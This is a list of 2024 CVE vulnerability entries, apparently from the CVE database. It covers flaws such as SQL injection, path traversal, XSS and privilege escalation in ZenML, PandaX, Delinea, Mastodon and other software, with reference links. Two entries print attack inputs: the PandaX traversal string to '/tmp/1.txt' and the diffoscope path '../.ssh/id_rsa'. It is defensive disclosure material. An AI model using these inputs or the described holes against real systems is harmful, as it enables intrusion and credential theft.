CVE 2024 25723 Candidate ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2. CONFIRM:https://github.com/zenml-io/zenml/compare/0.42.1...0.42.2 | CONFIRM:https://github.com/zenml-io/zenml/compare/0.43.0...0.43.1 | CONFIRM:https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4 | CONFIRM:https://www.zenml.io/blog/critical-security-update-for-zenml-users | MISC:https://github.com/zenml-io/zenml Assigned (20240211)
CVE 2024 25722 Candidate qanything_kernel/connector/database/mysql/mysql_client.py in qanything.ai QAnything before 1.2.0 allows SQL Injection. MISC:https://github.com/netease-youdao/QAnything/commit/35753b892c2c4361b318d68dfa3e251c85ce889c | MISC:https://github.com/netease-youdao/QAnything/compare/v1.1.1...v1.2.0 Assigned (20240211)
CVE 2024 2572 Candidate A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /task-details.php. The manipulation leads to execution after redirect. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257075. MISC:VDB-257075 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257075 | MISC:VDB-257075 | SourceCodester Employee Task Management System task-details.php redirect | URL:https://vuldb.com/?id.257075 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20task-details.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20task-details.php.md Assigned (20240317)
CVE 2024 25718 Candidate In the Samly package before 1.4.0 for Elixir, Samly.State.Store.get_assertion/3 can return an expired session, which interferes with access control because Samly.AuthHandler uses a cached session and does not replace it, even after expiry. MISC:https://diff.hex.pm/diff/samly/1.3.0..1.4.0 | MISC:https://github.com/dropbox/samly | MISC:https://github.com/dropbox/samly/pull/13 | MISC:https://github.com/dropbox/samly/pull/13/commits/812b5c3ad076dc9c9334c1a560c8e6470607d1eb | MISC:https://github.com/handnot2/samly | MISC:https://hex.pm/packages/samly Assigned (20240211)
CVE 2024 25715 Candidate Glewlwyd SSO server 2.x through 2.7.6 allows open redirection via redirect_uri. MISC:https://github.com/babelouest/glewlwyd/commit/59239381a88c505ab38fe64fdd92f846defa5754 | MISC:https://github.com/babelouest/glewlwyd/commit/c91c0155f2393274cc18efe77e06c6846e404c75 Assigned (20240211)
CVE 2024 25714 Candidate In Rhonabwy through 1.1.13, HMAC signature verification uses a strcmp function that is vulnerable to side-channel attacks, because it stops the comparison when the first difference is spotted in the two signatures. (The fix uses gnutls_memcmp, which has constant-time execution.) MISC:https://github.com/babelouest/rhonabwy/commit/f9fd9a1c77e48b514ebb3baf0360f87eef3d846e Assigned (20240211)
CVE 2024 25713 Candidate yyjson through 0.8.0 has a double free, leading to remote code execution in some cases, because the pool_free function lacks loop checks. (pool_free is part of the pool series allocator, along with pool_malloc and pool_realloc.) MISC:https://github.com/ibireme/yyjson/security/advisories/GHSA-q4m7-9pcm-fpxh Assigned (20240211)
CVE 2024 25712 Candidate http-swagger before 1.2.6 allows XSS via PUT requests, because a file that has been uploaded (via httpSwagger.WrapHandler and *webdav.memFile) can subsequently be accessed via a GET request. NOTE: this is independently fixable with respect to CVE-2022-24863, because (if a solution continued to allow PUT requests) large files could have been blocked without blocking JavaScript, or JavaScript could have been blocked without blocking large files. MISC:https://cosmosofcyberspace.github.io/improper_http_method_leads_to_xss/poc.html | MISC:https://github.com/swaggo/http-swagger/releases/tag/v1.2.6 Assigned (20240211)
CVE 2024 25711 Candidate diffoscope before 256 allows directory traversal via an embedded filename in a GPG file. Contents of any file, such as ../.ssh/id_rsa, may be disclosed to an attacker. This occurs because the value of the gpg --use-embedded-filenames option is trusted. FEDORA:FEDORA-2024-3383326db4 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OUNBANAWD6TZH2NRRV4YUIAXEHLUJQ47/ | MISC:https://salsa.debian.org/reproducible-builds/diffoscope/-/commit/dfed769904c27d66a14a5903823d9c8c5aae860e | MISC:https://salsa.debian.org/reproducible-builds/diffoscope/-/issues/361 Assigned (20240211)
CVE 2024 25710 Candidate Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.3 through 1.25.0. Users are recommended to upgrade to version 1.26.0 which fixes the issue. CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0010/ | MISC:https://lists.apache.org/thread/cz8qkcwphy4cx8gltn932ln51cbtq6kf | URL:https://lists.apache.org/thread/cz8qkcwphy4cx8gltn932ln51cbtq6kf | MLIST:[oss-security] 20240219 CVE-2024-25710: Apache Commons Compress: Denial of service caused by an infinite loop for a corrupted DUMP file | URL:http://www.openwall.com/lists/oss-security/2024/02/19/1 Assigned (20240210)
CVE 2024 2571 Candidate A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /manage-admin.php. The manipulation leads to execution after redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257074 is the identifier assigned to this vulnerability. MISC:VDB-257074 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257074 | MISC:VDB-257074 | SourceCodester Employee Task Management System manage-admin.php redirect | URL:https://vuldb.com/?id.257074 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20manage-admin.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20manage-admin.php.md Assigned (20240317)
CVE 2024 2570 Candidate A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been classified as critical. This affects an unknown part of the file /edit-task.php. The manipulation leads to execution after redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257073 was assigned to this vulnerability. MISC:VDB-257073 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257073 | MISC:VDB-257073 | SourceCodester Employee Task Management System edit-task.php redirect | URL:https://vuldb.com/?id.257073 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20edit-task.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20edit-task.php.md Assigned (20240317)
CVE 2024 2569 Candidate A vulnerability was found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin-manage-user.php. The manipulation leads to execution after redirect. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257072. MISC:VDB-257072 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257072 | MISC:VDB-257072 | SourceCodester Employee Task Management System admin-manage-user.php redirect | URL:https://vuldb.com/?id.257072 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20admin-manage-user.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Employee%20Task%20Management%20System/Execution%20After%20Redirect%20-%20admin-manage-user.php.md Assigned (20240317)
CVE 2024 2568 Candidate A vulnerability has been found in heyewei JFinalCMS 5.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/div_data/delete?divId=9 of the component Custom Data Page. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257071. MISC:VDB-257071 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257071 | MISC:VDB-257071 | heyewei JFinalCMS Custom Data Page sql injection | URL:https://vuldb.com/?id.257071 | MISC:https://github.com/bigbigbigbaby/cms/blob/main/5.md | URL:https://github.com/bigbigbigbaby/cms/blob/main/5.md Assigned (20240317)
CVE 2024 25679 Candidate In PQUIC before 5bde5bb, retention of unused initial encryption keys allows attackers to disrupt a connection with a PSK configuration by sending a CONNECTION_CLOSE frame that is encrypted via the initial key computed. Network traffic sniffing is needed as part of exploitation. MISC:https://github.com/p-quic/pquic/issues/35 | MISC:https://github.com/p-quic/pquic/pull/39 | MISC:https://www.rfc-editor.org/rfc/rfc9001#name-discarding-unused-keys Assigned (20240209)
CVE 2024 25678 Candidate In LiteSpeed QUIC (LSQUIC) Library before 4.0.4, DCID validation is mishandled. MISC:https://github.com/litespeedtech/lsquic/commit/515f453556c99d27c4dddb5424898dc1a5537708 | MISC:https://github.com/litespeedtech/lsquic/releases/tag/v4.0.4 | MISC:https://www.rfc-editor.org/rfc/rfc9001 Assigned (20240209)
CVE 2024 25677 Candidate In Min before 1.31.0, local files are not correctly treated as unique security origins, which allows them to improperly request cross-origin resources. For example, a local file may request other local files through an XML document. MISC:https://github.com/minbrowser/min/security/advisories/GHSA-4w9v-7h8h-rv8x Assigned (20240209)
CVE 2024 25675 Candidate An issue was discovered in MISP before 2.4.184. A client does not need to use POST to start an export generation process. This is related to app/Controller/JobsController.php and app/View/Events/export.ctp. MISC:https://github.com/MISP/MISP/commit/0ac2468c2896f4be4ef9219cfe02bff164411594 | MISC:https://github.com/MISP/MISP/compare/v2.4.183...v2.4.184 Assigned (20240209)
CVE 2024 25674 Candidate An issue was discovered in MISP before 2.4.184. Organisation logo upload is insecure because of a lack of checks for the file extension and MIME type. MISC:https://github.com/MISP/MISP/commit/312d2d5422235235ddd211dcb6bb5bb09c07791f | MISC:https://github.com/MISP/MISP/compare/v2.4.183...v2.4.184 Assigned (20240209)
CVE 2024 2567 Candidate ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, was found in jurecapuder AndroidWeatherApp 1.0.0 on Android. Affected is an unknown function of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. VDB-257070 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The code maintainer was contacted early about this disclosure but did not respond in any way. Instead the GitHub repository got deleted after a few days. We have to assume that the product is not supported anymore. MISC:VDB-257070 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257070 | MISC:VDB-257070 | jurecapuder AndroidWeatherApp Backup File androidmanifest.xml backup | URL:https://vuldb.com/?id.257070 | MISC:https://github.com/ctflearner/Android_Findings/blob/main/AndroidWeatherApp/Android_backup.md | URL:https://github.com/ctflearner/Android_Findings/blob/main/AndroidWeatherApp/Android_backup.md Assigned (20240317)
CVE 2024 2566 Candidate A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240313. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file api/client/get_extension_yl.php. The manipulation of the argument imei leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257065 was assigned to this vulnerability. MISC:VDB-257065 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257065 | MISC:VDB-257065 | Fujian Kelixin Communication Command and Dispatch Platform get_extension_yl.php sql injection | URL:https://vuldb.com/?id.257065 | MISC:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-get_extension_yl.pdf | URL:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-get_extension_yl.pdf Assigned (20240316)
CVE 2024 25657 Candidate An open redirect in the Login/Logout functionality of web management in AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS could allow attackers to redirect authenticated users to malicious websites. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25657 Assigned (20240209)
CVE 2024 25656 Candidate Improper input validation in AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS can result in unauthenticated CPE (Customer Premises Equipment) devices storing arbitrarily large amounts of data during registration. This can potentially lead to DDoS attacks on the application database and, ultimately, affect the entire product. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25656 Assigned (20240209)
CVE 2024 25655 Candidate Insecure storage of LDAP passwords in the authentication functionality of AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS allows members (with read access to the application database) to decrypt the LDAP passwords of users who successfully authenticate to web management via LDAP. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25655 Assigned (20240209)
CVE 2024 25654 Candidate Insecure permissions for log files of AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS allow members (with local access to the UMP application server) to access credentials to authenticate to all services, and to decrypt sensitive data stored in the database. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25654 Assigned (20240209)
CVE 2024 25653 Candidate Broken Access Control in the Report functionality of Delinea PAM Secret Server 11.4 allows unprivileged users, when Unlimited Admin Mode is enabled, to view system reports and modify custom reports via the Report functionality in the Web UI. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25653 Assigned (20240209)
CVE 2024 25652 Candidate In Delinea PAM Secret Server 11.4, it is possible for a user (with access to the Report functionality) to gain unauthorized access to remote sessions created by legitimate users. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25652 Assigned (20240209)
CVE 2024 25651 Candidate User enumeration can occur in the Authentication REST API in Delinea PAM Secret Server 11.4. This allows a remote attacker to determine whether a user is valid because of a difference in responses from the /oauth2/token endpoint. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25651 Assigned (20240209)
CVE 2024 25650 Candidate Insecure key exchange between Delinea PAM Secret Server 11.4 and the Distributed Engine 8.4.3 allows a PAM administrator to obtain the Symmetric Key (used to encrypt RabbitMQ messages) via crafted payloads to the /pre-authenticate, /authenticate, and /execute-and-respond REST API endpoints. This makes it possible for a PAM administrator to impersonate the Engine and exfiltrate sensitive information from the messages published in the RabbitMQ exchanges, without being audited in the application. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25650 Assigned (20240209)
CVE 2024 2565 Candidate A vulnerability was found in PandaXGO PandaX up to 20240310. It has been classified as critical. Affected is an unknown function of the file /apps/system/router/upload.go of the component File Extension Handler. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257064. MISC:VDB-257064 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257064 | MISC:VDB-257064 | PandaXGO PandaX File Extension upload.go unrestricted upload | URL:https://vuldb.com/?id.257064 | MISC:https://github.com/PandaXGO/PandaX/issues/5 | URL:https://github.com/PandaXGO/PandaX/issues/5 Assigned (20240316)
CVE 2024 25649 Candidate In Delinea PAM Secret Server 11.4, it is possible for an attacker (with Administrator access to the Secret Server machine) to read the following data from a memory dump: the decrypted master key, database credentials (when SQL Server Authentication is enabled), the encryption key of RabbitMQ queue messages, and session cookies. MISC:https://www.cvcn.gov.it/cvcn/cve/CVE-2024-25649 Assigned (20240209)
CVE 2024 25645 Candidate Under certain condition SAP NetWeaver (Enterprise Portal) - version 7.50 allows an attacker to access information which would otherwise be restricted causing low impact on confidentiality of the application and with no impact on Integrity and Availability of the application. MISC:https://me.sap.com/notes/3428847 | URL:https://me.sap.com/notes/3428847 | MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 | URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 Assigned (20240209)
CVE 2024 25644 Candidate Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application. MISC:https://me.sap.com/notes/3425682 | URL:https://me.sap.com/notes/3425682 | MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 | URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 Assigned (20240209)
CVE 2024 25643 Candidate The SAP Fiori app (My Overtime Request) - version 605, does not perform the necessary authorization checks for an authenticated user which may result in an escalation of privileges. It is possible to manipulate the URLs of data requests to access information that the user should not have access to. There is no impact on integrity and availability. MISC:https://me.sap.com/notes/3237638 | URL:https://me.sap.com/notes/3237638 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240209)
CVE 2024 25642 Candidate Due to improper validation of certificate in SAP Cloud Connector - version 2.0, attacker can impersonate the genuine servers to interact with SCC breaking the mutual authentication. Hence, the attacker can intercept the request to view/modify sensitive information. There is no impact on the availability of the system. MISC:https://me.sap.com/notes/3424610 | URL:https://me.sap.com/notes/3424610 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240209)
CVE 2024 25640 Candidate Iris is a web collaborative platform that helps incident responders share technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.4.0. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker need to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.4.0 of iris-web. No workarounds are available. MISC:https://github.com/dfir-iris/iris-web/security/advisories/GHSA-2xq6-qc74-w5vp | URL:https://github.com/dfir-iris/iris-web/security/advisories/GHSA-2xq6-qc74-w5vp Assigned (20240208)
CVE 2024 2564 Candidate A vulnerability was found in PandaXGO PandaX up to 20240310 and classified as critical. This issue affects the function ExportUser of the file /apps/system/api/user.go. The manipulation of the argument filename leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257063. MISC:VDB-257063 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257063 | MISC:VDB-257063 | PandaXGO PandaX user.go ExportUser path traversal | URL:https://vuldb.com/?id.257063 | MISC:https://github.com/PandaXGO/PandaX/issues/6 | URL:https://github.com/PandaXGO/PandaX/issues/6 Assigned (20240316)
CVE 2024 25636 Candidate Misskey is an open source, decentralized social media platform with ActivityPub support. Prior to version 2024.2.0, when fetching remote Activity Streams objects, Misskey doesn't check that the response from the remote server has a `Content-Type` header value of the Activity Streams media type, which allows a threat actor to upload a crafted Activity Streams document to a remote server and make a Misskey instance fetch it, if the remote server accepts arbitrary user uploads. The vulnerability allows a threat actor to impersonate and take over an account on a remote server that satisfies all of the following properties: allows the threat actor to register an account; accepts arbitrary user-uploaded documents and places them on the same domain as legitimate Activity Streams actors; and serves user-uploaded document in response to requests with an `Accept` header value of the Activity Streams media type. Version 2024.2.0 contains a patch for the issue. MISC:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/core/activitypub/ApResolverService.ts#L69-L119 | URL:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/core/activitypub/ApResolverService.ts#L69-L119 | MISC:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/core/activitypub/models/ApNoteService.ts#L112-L308 | URL:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/core/activitypub/models/ApNoteService.ts#L112-L308 | MISC:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/server/api/endpoints/ap/show.ts#L125-L143 | URL:https://github.com/misskey-dev/misskey/blob/2024.2.0-beta.10/packages/backend/src/server/api/endpoints/ap/show.ts#L125-L143 | MISC:https://github.com/misskey-dev/misskey/commit/9a70ce8f5ea9df00001894809f5ce7bc69b14c8a | URL:https://github.com/misskey-dev/misskey/commit/9a70ce8f5ea9df00001894809f5ce7bc69b14c8a | MISC:https://github.com/misskey-dev/misskey/security/advisories/GHSA-qqrm-9grj-6v32 | URL:https://github.com/misskey-dev/misskey/security/advisories/GHSA-qqrm-9grj-6v32 Assigned (20240208)
CVE 2024 25635 Candidate alf.io is an open source ticket reservation system. Prior to version 2.0-Mr-2402, organization owners can view the generated API KEY and USERS of other organization owners using the `http://192.168.26.128:8080/admin/api/users/<user_id>` endpoint, which exposes the details of the provided user ID. This may also expose the API KEY in the username of the user. Version 2.0-M4-2402 fixes this issue. MISC:https://github.com/alfio-event/alf.io/security/advisories/GHSA-ffr5-g3qg-gp4f | URL:https://github.com/alfio-event/alf.io/security/advisories/GHSA-ffr5-g3qg-gp4f Assigned (20240208)
CVE 2024 25634 Candidate alf.io is an open source ticket reservation system. Prior to version 2.0-Mr-2402, an attacker can access data from other organizers. The attacker can use a specially crafted request to receive the e-mail log sent by other events. Version 2.0-M4-2402 fixes this issue. MISC:https://github.com/alfio-event/alf.io/security/advisories/GHSA-5wcv-pjc6-mxvv | URL:https://github.com/alfio-event/alf.io/security/advisories/GHSA-5wcv-pjc6-mxvv Assigned (20240208)
CVE 2024 25631 Candidate Cilium is a networking, observability, and security solution with an eBPF-based dataplane. For Cilium users who have enabled an external kvstore and Wireguard transparent encryption, traffic between pods in the affected cluster is not encrypted. This issue affects Cilium v1.14 before v1.14.7 and has been patched in Cilium v1.14.7. There is no workaround to this issue. MISC:https://docs.cilium.io/en/stable/installation/k8s-install-external-etcd/#when-do-i-need-to-use-a-kvstore | URL:https://docs.cilium.io/en/stable/installation/k8s-install-external-etcd/#when-do-i-need-to-use-a-kvstore | MISC:https://docs.cilium.io/en/stable/security/network/encryption-wireguard/#encryption-wg | URL:https://docs.cilium.io/en/stable/security/network/encryption-wireguard/#encryption-wg | MISC:https://github.com/cilium/cilium/releases/tag/v1.14.7 | URL:https://github.com/cilium/cilium/releases/tag/v1.14.7 | MISC:https://github.com/cilium/cilium/security/advisories/GHSA-x989-52fc-4vr4 | URL:https://github.com/cilium/cilium/security/advisories/GHSA-x989-52fc-4vr4 Assigned (20240208)
CVE 2024 25630 Candidate Cilium is a networking, observability, and security solution with an eBPF-based dataplane. For Cilium users who are using CRDs to store Cilium state (the default configuration) and Wireguard transparent encryption, traffic to/from the Ingress and health endpoints is not encrypted. This issue affects Cilium v1.14 before v1.14.7 and has been patched in Cilium v1.14.7. There is no workaround to this issue. MISC:https://docs.cilium.io/en/stable/security/network/encryption-wireguard/#encryption-wg | URL:https://docs.cilium.io/en/stable/security/network/encryption-wireguard/#encryption-wg | MISC:https://github.com/cilium/cilium/releases/tag/v1.14.7 | URL:https://github.com/cilium/cilium/releases/tag/v1.14.7 | MISC:https://github.com/cilium/cilium/security/advisories/GHSA-7496-fgv9-xw82 | URL:https://github.com/cilium/cilium/security/advisories/GHSA-7496-fgv9-xw82 Assigned (20240208)
CVE 2024 2563 Candidate A vulnerability has been found in PandaXGO PandaX up to 20240310 and classified as critical. This vulnerability affects the function DeleteImage of the file /apps/system/router/upload.go. The manipulation of the argument fileName with the input ../../../../../../../../../tmp/1.txt leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257062 is the identifier assigned to this vulnerability. MISC:VDB-257062 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257062 | MISC:VDB-257062 | PandaXGO PandaX upload.go DeleteImage path traversal | URL:https://vuldb.com/?id.257062 | MISC:https://github.com/PandaXGO/PandaX/pull/3 | URL:https://github.com/PandaXGO/PandaX/pull/3 Assigned (20240316)
CVE 2024 25629 Candidate c-ares is a C library for asynchronous DNS requests. `ares__read_line()` is used to parse local configuration files such as `/etc/resolv.conf`, `/etc/nsswitch.conf`, the `HOSTALIASES` file, and if using a c-ares version prior to 1.27.0, the `/etc/hosts` file. If any of these configuration files has an embedded `NULL` character as the first character in a new line, it can lead to attempting to read memory prior to the start of the given buffer which may result in a crash. This issue is fixed in c-ares 1.27.0. No known workarounds exist. MISC:https://github.com/c-ares/c-ares/commit/a804c04ddc8245fc8adf0e92368709639125e183 | URL:https://github.com/c-ares/c-ares/commit/a804c04ddc8245fc8adf0e92368709639125e183 | MISC:https://github.com/c-ares/c-ares/security/advisories/GHSA-mg26-v6qh-x48q | URL:https://github.com/c-ares/c-ares/security/advisories/GHSA-mg26-v6qh-x48q Assigned (20240208)
CVE 2024 25628 Candidate Alf.io is a free and open source event attendance management system. In versions prior to 2.0-M4-2402 users can access the admin area even after being invalidated/deleted. This issue has been addressed in version 2.0-M4-2402. All users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/alfio-event/alf.io/security/advisories/GHSA-8p6m-mm22-q893 | URL:https://github.com/alfio-event/alf.io/security/advisories/GHSA-8p6m-mm22-q893 Assigned (20240208)
CVE 2024 25627 Candidate Alf.io is a free and open source event attendance management system. An administrator on the alf.io application is able to upload HTML files that trigger JavaScript payloads. As such, an attacker gaining administrative access to the alf.io application may be able to persist access by planting an XSS payload. This issue has been addressed in version 2.0-M4-2402. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/alfio-event/alf.io/security/advisories/GHSA-gpmg-8f92-37cf | URL:https://github.com/alfio-event/alf.io/security/advisories/GHSA-gpmg-8f92-37cf Assigned (20240208)
CVE 2024 25626 Candidate Yocto Project is an open source collaboration project that helps developers create custom Linux-based systems regardless of the hardware architecture. In Yocto Projects Bitbake before 2.6.2 (before and included Yocto Project 4.3.1), with the Toaster server (included in bitbake) running, missing input validation allows an attacker to perform a remote code execution in the server's shell via a crafted HTTP request. Authentication is not necessary. Toaster server execution has to be specifically run and is not the default for Bitbake command line builds, it is only used for the Toaster web based user interface to Bitbake. The fix has been backported to the bitbake included with Yocto Project 5.0, 3.1.31, 4.0.16, and 4.3.2. MISC:https://github.com/yoctoproject/poky/security/advisories/GHSA-75xw-78mm-72r4 | URL:https://github.com/yoctoproject/poky/security/advisories/GHSA-75xw-78mm-72r4 Assigned (20240208)
CVE 2024 25625 Candidate Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. A potential security vulnerability has been discovered in `pimcore/admin-ui-classic-bundle` prior to version 1.3.4. The vulnerability involves a Host Header Injection in the `invitationLinkAction` function of the UserController, specifically in the way `$loginUrl` trusts user input. The host header from incoming HTTP requests is used unsafely when generating URLs. An attacker can manipulate the HTTP host header in requests to the /admin/user/invitationlink endpoint, resulting in the generation of URLs with the attacker's domain. In fact, if a host header is injected in the POST request, the $loginURL parameter is constructed with this unvalidated host header. It is then used to send an invitation email to the provided user. This vulnerability can be used to perform phishing attacks by making the URLs in the invitation links emails point to an attacker-controlled domain. Version 1.3.4 contains a patch for the vulnerability. The maintainers recommend validating the host header and ensuring it matches the application's domain. It would also be beneficial to use a default trusted host or hostname if the incoming host header is not recognized or is absent. MISC:https://github.com/pimcore/admin-ui-classic-bundle/commit/b9fee9d383fc73dbd5e1d98dbb0ff3266d6b5a82 | URL:https://github.com/pimcore/admin-ui-classic-bundle/commit/b9fee9d383fc73dbd5e1d98dbb0ff3266d6b5a82 | MISC:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3qpq-6w89-f7mx | URL:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3qpq-6w89-f7mx Assigned (20240208)
CVE 2024 25623 Candidate Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.2.7, 4.1.15, 4.0.15, and 3.5.19, when fetching remote statuses, Mastodon doesn't check that the response from the remote server has a `Content-Type` header value of the Activity Streams media type, which allows a threat actor to upload a crafted Activity Streams document to a remote server and make a Mastodon server fetch it, if the remote server accepts arbitrary user uploads. The vulnerability allows a threat actor to impersonate an account on a remote server that satisfies all of the following properties: allows the attacker to register an account; accepts arbitrary user-uploaded documents and places them on the same domain as the ActivityPub actors; and serves user-uploaded document in response to requests with an `Accept` header value of the Activity Streams media type. Versions 4.2.7, 4.1.15, 4.0.15, and 3.5.19 contain a fix for this issue. MISC:https://github.com/mastodon/mastodon/commit/9fee5e852669e26f970e278021302e1a203fc022 | URL:https://github.com/mastodon/mastodon/commit/9fee5e852669e26f970e278021302e1a203fc022 | MISC:https://github.com/mastodon/mastodon/security/advisories/GHSA-jhrq-qvrm-qr36 | URL:https://github.com/mastodon/mastodon/security/advisories/GHSA-jhrq-qvrm-qr36 Assigned (20240208)
